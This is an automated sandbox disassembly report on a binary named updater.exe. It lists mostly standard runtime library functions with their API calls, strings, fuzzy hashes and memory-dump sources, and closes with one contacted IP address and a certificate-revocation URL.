Opcode ID: 49e413c35f1052fb735c36487a481badbd0557dc1e579f005233cc51db7257fc
Instruction ID: c2642f892cd0817a131b7bc5bcdf2e0daa1239b7c69a1284cf4c40332e9d33f5
Opcode Fuzzy Hash: 49e413c35f1052fb735c36487a481badbd0557dc1e579f005233cc51db7257fc
Instruction Fuzzy Hash: B541A472D00512ABDB1DAFBBCC40A9E7A75EFEC320F14051BE914A72B0D734D4498762

Uniqueness

Uniqueness Score: -1.00%

Function 0144173A Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(83000000,CE5F1F10,0000001C,CE5F1F10,?,?,?), ref: 01441656
__FindPESection.LIBCMT ref: 01441693
_ValidateScopeTableHandlers.LIBCMT ref: 014416B3
__FindPESection.LIBCMT ref: 014416CD

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersQueryScopeTableValidateVirtual
String ID:
API String ID: 1876002356-0
Opcode ID: 2c0497725e8c3e9d23a3499e6f28187a2fff20a88795f40e0113d98dbe5a05f0
Instruction ID: fbc8ea4b10cf2899c9f74c2843560d1f52e6a44d29889529055a2097acdab71a
Opcode Fuzzy Hash: 2c0497725e8c3e9d23a3499e6f28187a2fff20a88795f40e0113d98dbe5a05f0
Instruction Fuzzy Hash: 4D318275A002169BFB24DB6DE9807AE77A8EB08A54F05016ADD09E7375E731FC80CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0142AE9E Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58d5d8d05624b6d8d656217d09eac91eb6adfe9506b98ff5e336235b4ae8baf5
Instruction ID: 5c7187c76854ad44ed14da0a485cebc837ad2f70d50718727fdb14665303f598
Opcode Fuzzy Hash: 58d5d8d05624b6d8d656217d09eac91eb6adfe9506b98ff5e336235b4ae8baf5
Instruction Fuzzy Hash: 3021C8F1604126BF9B11AF668C90D6BB76CEF58664761451AFC24C7AB0D734DC818760

Uniqueness

Uniqueness Score: -1.00%

Function 0143049B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
_free.LIBCMT ref: 014304FD
_free.LIBCMT ref: 01430533
SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 948a9e4cf062f8d74c64f33e4ed6dc2d89af9d1ee1c5179a3c728b6fb31822a4
Instruction ID: a842b0507eb6693c04879afd80551f586ca1edf8d82f6e937ff0a9f16f477084
Opcode Fuzzy Hash: 948a9e4cf062f8d74c64f33e4ed6dc2d89af9d1ee1c5179a3c728b6fb31822a4
Instruction Fuzzy Hash: 7F11EC722062023BD621667B6C84E2B356BABF4775B55073FF628872F4EE718C458231

Uniqueness

Uniqueness Score: -1.00%

Function 014305F2 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 014305F7
_free.LIBCMT ref: 01430654
_free.LIBCMT ref: 0143068A
SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430695

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: b8882117d22aada1aaaabbb6887fbcefe890f7b84d539de7a3eef630c3731e06
Instruction ID: f6aad544e5b56f7c91d8c22e1806c316c8390783ae69ac3b0b09076957dda0f1
Opcode Fuzzy Hash: b8882117d22aada1aaaabbb6887fbcefe890f7b84d539de7a3eef630c3731e06
Instruction Fuzzy Hash: 7411E9712052013AD621667B5C84E2B366AABE8779B74072BF62C832F9EE7188459221

Uniqueness

Uniqueness Score: -1.00%

Function 0140864B Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01408652

Part of subcall function 014070FE: std::_Lockit::_Lockit.LIBCPMT ref: 0140710F
Part of subcall function 014070FE: int.LIBCPMT ref: 01407126
Part of subcall function 014070FE: std::_Lockit::~_Lockit.LIBCPMT ref: 01407180

_Find_elem.LIBCPMT ref: 01408864

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 014086BA

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: 32f6fb17dfc5b49fcb2f256eeb87eb67b224ac993aa25d72d7819008ca226ad9
Instruction ID: 631099ef377126c3df2c33839c9fcc66575de519ea449461f3389a53165b996f
Opcode Fuzzy Hash: 32f6fb17dfc5b49fcb2f256eeb87eb67b224ac993aa25d72d7819008ca226ad9
Instruction Fuzzy Hash: 7CD18F31D0428A8AEF17EBAACA507EDBBB1AF55310F28406ED4856B3E7CB345945CB11

Uniqueness

Uniqueness Score: -1.00%

Function 014104A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014104AA

Part of subcall function 0140C8C4: std::_Lockit::_Lockit.LIBCPMT ref: 0140C8D5
Part of subcall function 0140C8C4: int.LIBCPMT ref: 0140C8EC
Part of subcall function 0140C8C4: std::_Lockit::~_Lockit.LIBCPMT ref: 0140C946

_Find_elem.LIBCPMT ref: 014106FA

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 01410521

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: 9dfaf43fe63344b3f0e22b11c8cec3605007065f889cc74eb070bf9b66cb1fb0
Instruction ID: e6b120ab0a20672a9351bae87efca96c663878a9772fe7db454e81ae1acac1bd
Opcode Fuzzy Hash: 9dfaf43fe63344b3f0e22b11c8cec3605007065f889cc74eb070bf9b66cb1fb0
Instruction Fuzzy Hash: 5FD1C431D042598EEF26DF68C8907EDBBB1BF54314F54409FE849AB2AADB7488C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014108C3 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014108CD

Part of subcall function 0140C959: std::_Lockit::_Lockit.LIBCPMT ref: 0140C96A
Part of subcall function 0140C959: int.LIBCPMT ref: 0140C981
Part of subcall function 0140C959: std::_Lockit::~_Lockit.LIBCPMT ref: 0140C9DB

_Find_elem.LIBCPMT ref: 01410B1D

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 01410944

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2124549159-2799312399
Opcode ID: 1374231511097c62cf231908f81ebffc08a49434c132252ccd0023f0241cbab4
Instruction ID: 0e6f8cf93bf382204cf938e545bced2ea5597edc38cc587f03e4f93a41bbc883
Opcode Fuzzy Hash: 1374231511097c62cf231908f81ebffc08a49434c132252ccd0023f0241cbab4
Instruction Fuzzy Hash: ECD1A431D043598EEF25DFA8C8547EDBBB2BF15314F14819BE489AB2AADB3448C5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0142AB7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0142AC0D

Strings

pow, xrefs: 0142ABE5, 0142AC02

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 9b0b7a05004cc97096162a00293aa488ab4c3b3cbeba089b180eb6b093b1f558
Instruction ID: 433252c452fda62f6f37bbf328cd2c67cab97d98df292f4894302a503a0ed3f4
Opcode Fuzzy Hash: 9b0b7a05004cc97096162a00293aa488ab4c3b3cbeba089b180eb6b093b1f558
Instruction Fuzzy Hash: 91518DA2A0810287DB22771CC90036B3FA1AB94702F744D6BF9D1437BDEB3584C68B86

Uniqueness

Uniqueness Score: -1.00%

Function 0141CA1F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0141CB80

Strings

-, xrefs: 0141CBAE
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0141CADE, 0141CB15, 0141CB1A

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: c3b986e031dee0ffbadab2901858db657b32e6cbe40d88221e539db838937c7b
Instruction ID: 117aa85a7c36e1ae8dffa415458e4f3c186799d9d5e8281cb0fe3e42eef4c99d
Opcode Fuzzy Hash: c3b986e031dee0ffbadab2901858db657b32e6cbe40d88221e539db838937c7b
Instruction Fuzzy Hash: A4510331B842899BDF26CEAD9CC07BFBFB5AF45240F04405BEA81D7368C2748942DB54

Uniqueness

Uniqueness Score: -1.00%

Function 013ED4AF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

%.2x, xrefs: 013ED622

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID: %.2x
API String ID: 0-936724101
Opcode ID: 62c47a4ad1560dd0017e2bce02e7afcbc20bc2e780504b629c08bfed24238919
Instruction ID: ac0b62a6df79c737698a95ec30f2759857d589a82700113ad2539ca1f6276c67
Opcode Fuzzy Hash: 62c47a4ad1560dd0017e2bce02e7afcbc20bc2e780504b629c08bfed24238919
Instruction Fuzzy Hash: 6751D971A04B52EFD714CF6CC485BA0BBE4BF19214F14816AE988CBA92E330E551CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0141C40C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0141C413
swprintf.LIBCMT ref: 0141C485

Part of subcall function 01406F3F: std::_Lockit::_Lockit.LIBCPMT ref: 01406F50
Part of subcall function 01406F3F: int.LIBCPMT ref: 01406F67
Part of subcall function 01406F3F: std::_Lockit::~_Lockit.LIBCPMT ref: 01406FC1

Strings

%.0Lf, xrefs: 0141C47D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3_Lockit::_Lockit::~_swprintf
String ID: %.0Lf
API String ID: 2921955253-1402515088
Opcode ID: dfdef55e8348d9156d0674231990eb24d947abd5299beaf5b6daf3f92eac9957
Instruction ID: 23b029f36fb59e8ba71971d941daf4e81c9685f768dda0220d9747ef4680d0f2
Opcode Fuzzy Hash: dfdef55e8348d9156d0674231990eb24d947abd5299beaf5b6daf3f92eac9957
Instruction Fuzzy Hash: A9516C71D00209AFCF09DFD4C884AEDBBB5FF18310F10441AE856AB2A9DB759955CF50

Uniqueness

Uniqueness Score: -1.00%

Function 014217A6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 014217CB

Strings

MOC, xrefs: 014217DD
RCC, xrefs: 014217E5

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f7574ee6f1876c40c7f615f8ceb61922a401218ec6eb5decdb974d15092cad7b
Instruction ID: 1f4aa7565a5a18936e4060d14eba93aa2b52d71d2aee6bb2d611eb15079249e8
Opcode Fuzzy Hash: f7574ee6f1876c40c7f615f8ceb61922a401218ec6eb5decdb974d15092cad7b
Instruction Fuzzy Hash: 63418B72900219AFDF16DF98CD80AEE7BB5FF48700F5481AAFA04A7221D3759991DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01418B06 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01418B0D
__cftoe.LIBCMT ref: 01418B89

Strings

!%x, xrefs: 01418B1E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 780bb4b88363005d8657245f1107ddd34d242d86e0374f673771efe415688b75
Instruction ID: e22bba143ed604ccda7b92ed492c44edc7e19a7710c813c94016c673bf36f62c
Opcode Fuzzy Hash: 780bb4b88363005d8657245f1107ddd34d242d86e0374f673771efe415688b75
Instruction Fuzzy Hash: F43128B1D0120EAFCF04EF98E980AEEBBB5FF18314F10441AF504A7265E735AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0141259B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B606
Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B623
Part of subcall function 0140B5E6: _Maklocstr.LIBCPMT ref: 0140B640
Part of subcall function 0140B5E6: _Maklocchr.LIBCPMT ref: 0140B652
Part of subcall function 0140B5E6: _Maklocchr.LIBCPMT ref: 0140B665

_Mpunct.LIBCPMT ref: 0141262F
_Mpunct.LIBCPMT ref: 01412649

Strings

$+xv, xrefs: 01412654

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocstr$MaklocchrMpunct
String ID: $+xv
API String ID: 542472742-1686923651
Opcode ID: 4e60e8b0cc1c2f66381483ca24462569536c14bba431271408b1c368d4fbbfeb
Instruction ID: bdc01ee2df531500771299c82aa1bf4b70f01216f732707d81ce28f2ed71423d
Opcode Fuzzy Hash: 4e60e8b0cc1c2f66381483ca24462569536c14bba431271408b1c368d4fbbfeb
Instruction Fuzzy Hash: B921C4B1904B526FD726DF768890B7BBEF8BB28200F14095FE459C7A90D774E641CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0141AB5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_Mpunct.LIBCPMT ref: 0141ABF2
_Mpunct.LIBCPMT ref: 0141AC0C

Strings

$+xv, xrefs: 0141AC17

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Mpunct
String ID: $+xv
API String ID: 4240859931-1686923651
Opcode ID: b70f5c69d82d715e228f96f831b1266a2962eec9ac645a907e563a80474d2787
Instruction ID: 641d8221da2dbef8c85a254d888a84c3414cb082603c6ea21dc7d3445b42f3cb
Opcode Fuzzy Hash: b70f5c69d82d715e228f96f831b1266a2962eec9ac645a907e563a80474d2787
Instruction Fuzzy Hash: C521B2B1904B926FD722DF758890B7BBFE8BB28200F14095FE599C7A50D334E641CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01408AA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01408AA7

Strings

true, xrefs: 01408B11
false, xrefs: 01408AFE

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: f0198abfedd2e00e872bd2c6f9b65c406ba7392264e178cef9ee3391979c1ac9
Instruction ID: c0d77076e9e0057fdb2e728f8ede6949cb1e97da8ed4dc886091c835babd0ae2
Opcode Fuzzy Hash: f0198abfedd2e00e872bd2c6f9b65c406ba7392264e178cef9ee3391979c1ac9
Instruction Fuzzy Hash: 9711D3B1D407469FC722EFB6D401B8ABBF4AF25200F14852FE5A68B6A0EB70E545CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013EC2D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013EC316

Strings

%lld, xrefs: 013EC2F2
%!.15g, xrefs: 013EC305

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %!.15g$%lld
API String ID: 4218353326-2983862324
Opcode ID: 18d02f223b3c8aff2026b64ec029702f65c62cc1ec10fafa0fa6859e76463abe
Instruction ID: fac9e9408fae41ae8f84a2bbea88a011a00da8eea580c041a6e9e49e0d0bcc49
Opcode Fuzzy Hash: 18d02f223b3c8aff2026b64ec029702f65c62cc1ec10fafa0fa6859e76463abe
Instruction Fuzzy Hash: 57F07872604B046AD3305F9E9C05A27BBF8DF99B04F00071EF5CA92582DAB0A94487E5

Uniqueness

Uniqueness Score: -1.00%

Function 0141D941 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 013C4317: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014606B0,013DF491,?,013DE301,80070057,?,013DF491,00000001), ref: 013C431D
Part of subcall function 013C4317: GetLastError.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014606B0,013DF491,?,013DE301,80070057,?,013DF491,00000001), ref: 013C4327

IsDebuggerPresent.KERNEL32(?,?,?,013C1130), ref: 0141D974
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,013C1130), ref: 0141D983

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0141D97E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 6914dac0daa9f42bc0b5fe6a0a58c211be864cceb5be73c4f64b8af3d76c7510
Instruction ID: 4cc7b97107cb3f7ad48035241dbb03a33f2edcc6bb668c2313b28245de086e59
Opcode Fuzzy Hash: 6914dac0daa9f42bc0b5fe6a0a58c211be864cceb5be73c4f64b8af3d76c7510
Instruction Fuzzy Hash: 60E092B86003518BE734DF69D5083467BE6AF00709F00881ED4A5C3728D7B0D448CB91

Uniqueness

Uniqueness Score: -1.00%

Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151
Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151

Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
